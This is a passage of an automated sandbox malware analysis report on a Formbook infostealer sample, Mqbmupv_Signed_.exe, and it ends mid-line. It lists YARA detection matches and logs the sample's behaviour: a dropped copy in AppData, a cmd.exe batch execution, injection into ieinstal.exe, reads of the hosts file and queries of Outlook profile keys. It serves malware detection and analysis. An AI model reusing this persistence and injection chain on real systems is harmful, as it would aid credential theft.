        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048784E GetDiskFreeSpaceA,
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile created: C:\Users\user\AppData\Local\Mqbmnet.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Users\user\Desktop\Mqbmupv_Signed_.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
        Source: C:\Windows\SysWOW64\ipconfig.exeFile written: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: ipconfig.pdb source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000009.00000002.345112527.0000000003140000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: ieinstal.exe
        Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231AAF8 push 004069CEh; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231A6D4 push 004065C3h; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_04C60BE8 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: 0_3_0231C1D4 push eax; ret
        Source: C:\Users\u